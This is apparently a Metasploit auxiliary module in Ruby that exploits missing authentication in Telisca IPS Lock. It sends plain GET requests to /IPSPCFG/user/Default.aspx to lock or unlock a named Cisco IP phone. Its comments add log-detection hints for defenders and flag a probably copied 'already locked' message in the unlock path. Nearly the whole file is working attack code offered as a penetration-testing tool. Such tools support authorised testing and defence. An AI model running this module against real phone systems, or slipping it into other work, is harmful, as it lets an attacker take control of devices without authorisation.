GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/voip/telisca_ips_lock_control.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
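# Auxiliary module that sends the Telisca IPS Lock "lock" / "unlock" web
# requests for a named Cisco IP phone.
#
# Both actions are plain GET requests to /IPSPCFG/user/Default.aspx. The module
# supplies no credentials or token; the phone is selected only by the `pn`
# query parameter. For defenders, the request path together with
# `action=DO&tg=L` (lock) or `action=U7LCK` (unlock) is what to look for in the
# IPS Lock web server's request logs (assuming query strings are logged), and
# network reachability of that web interface is what the module depends on.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata, the LOCK / UNLOCK actions and the two
  # required options (RHOST and PHONENAME).
  #
  # @param info [Hash] Metadata passed in by the framework and merged with the
  #   values below through update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Telisca IPS Lock Cisco IP Phone Control',
        'Description' => %q{
          This module allows an unauthenticated attacker to exercise the
          "Lock" and "Unlock" functionality of Telisca IPS Lock for Cisco IP
          Phones. This module should be run in the VoIP VLAN, and requires
          knowledge of the target phone's name (for example, SEP002497AB1D4B).

          Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.
        },
        'References' => [
          # Publicly disclosed via Metasploit PR.
          # Each reference is its own [type, value] pair; the original listed
          # 'URL' and the link as two separate top-level strings.
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/6470']
        ],
        'Author' => [
          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',
          'zirsalem'
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2015-12-17',
        'Actions' => [
          ['LOCK', { 'Description' => 'To lock a phone' }],
          ['UNLOCK', { 'Description' => 'To unlock a phone' }]
        ],
        'DefaultAction' => 'UNLOCK'
      )
    )

    register_options(
      [
        OptAddress.new('RHOST', [true, 'The IPS Lock IP Address']),
        OptString.new('PHONENAME', [true, 'The name of the target phone'])
      ]
    )
  end

  # Prefixes status output with the peer (host:port) before delegating.
  #
  # @param msg [String] Message text.
  def print_status(msg = '')
    super("#{peer} - #{msg}")
  end

  # Prefixes success output with the peer (host:port) before delegating.
  #
  # @param msg [String] Message text.
  def print_good(msg = '')
    super("#{peer} - #{msg}")
  end

  # Prefixes error output with the peer (host:port) before delegating.
  #
  # @param msg [String] Message text.
  def print_error(msg = '')
    super("#{peer} - #{msg}")
  end

  # Returns the status of the listening port by requesting "/".
  #
  # Any response at all counts as "open"; the status code is not inspected.
  # The three connection-level errors below are reported in verbose mode and
  # treated as "not open".
  #
  # @return [Boolean] true if a response was received, otherwise false.
  def port_open?
    return true if send_request_raw({ 'method' => 'GET', 'uri' => '/' })

    false
  rescue ::Rex::ConnectionRefused
    vprint_status('Connection refused')
    false
  rescue ::Rex::ConnectionError
    vprint_error('Connection failed')
    false
  rescue ::OpenSSL::SSL::SSLError
    vprint_error('SSL/TLS connection error')
    false
  end

  # Locks a device.
  #
  # Sends the lock request and classifies the outcome from substrings of the
  # response body. The substring checks are case-sensitive, so 'Unlock' and
  # 'unlocked' are distinct markers.
  #
  # @param phone_name [String] Name of the phone used for the pn parameter.
  #
  # @return [void]
  def lock(phone_name)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => '/IPSPCFG/user/Default.aspx',
      'headers' => {
        'Connection' => 'keep-alive',
        'Accept-Language' => 'en-US,en;q=0.5'
      },
      'vars_get' => {
        'action' => 'DO',
        'tg' => 'L',
        'pn' => phone_name,
        'dp' => '',
        'gr' => '',
        'gl' => ''
      }
    })

    if res.nil?
      print_error('The connection timed out while trying to lock.')
    elsif res.code != 200
      print_error("Unexpected response #{res.code}")
    elsif res.body.include?('Unlock') || res.body.include?('U7LCK')
      print_good("The device #{phone_name} is already locked")
    elsif res.body.include?('unlocked') || res.body.include?('Locking') || res.body.include?('QUIT')
      print_good("Device #{phone_name} successfully locked")
    else
      # Previously a 200 response with none of the known markers printed
      # nothing, leaving the operator without any indication of the outcome.
      print_error("Unrecognized response body; lock state of #{phone_name} is unknown")
    end
  end

  # Unlocks a phone.
  #
  # Sends the unlock request and classifies the outcome from substrings of the
  # response body (case-sensitive, as in #lock).
  #
  # @param phone_name [String] Name of the phone used for the pn parameter.
  #
  # @return [void]
  def unlock(phone_name)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => '/IPSPCFG/user/Default.aspx',
      'headers' => {
        'Connection' => 'keep-alive',
        'Accept-Language' => 'en-US,en;q=0.5'
      },
      'vars_get' => {
        'action' => 'U7LCK',
        'pn' => phone_name,
        'dp' => ''
      }
    })

    if res.nil?
      print_error('The connection timed out while trying to unlock')
    elsif res.code != 200
      print_error("Unexpected response #{res.code}")
    elsif res.body.include?('Unlock') || res.body.include?('U7LCK')
      # NOTE(review): this is the unlock path, yet the branch reports
      # "already locked" as a success; the wording matches #lock and may have
      # been copied from it. Confirm what these markers mean in an unlock
      # response before relying on this message.
      print_good("The device #{phone_name} is already locked")
    elsif res.body.include?('unlocked') || res.body.include?('QUIT')
      print_good("The device #{phone_name} successfully unlocked")
    else
      # Previously a 200 response with none of the known markers printed
      # nothing, leaving the operator without any indication of the outcome.
      print_error("Unrecognized response body; lock state of #{phone_name} is unknown")
    end
  end

  # Entry point: checks that the web server answers, then dispatches to #lock
  # or #unlock according to the selected ACTION.
  #
  # @return [void]
  def run
    unless port_open?
      print_error('The web server is unreachable!')
      return
    end

    phone_name = datastore['PHONENAME']
    case action.name
    when 'LOCK'
      lock(phone_name)
    when 'UNLOCK'
      unlock(phone_name)
    end
  end
end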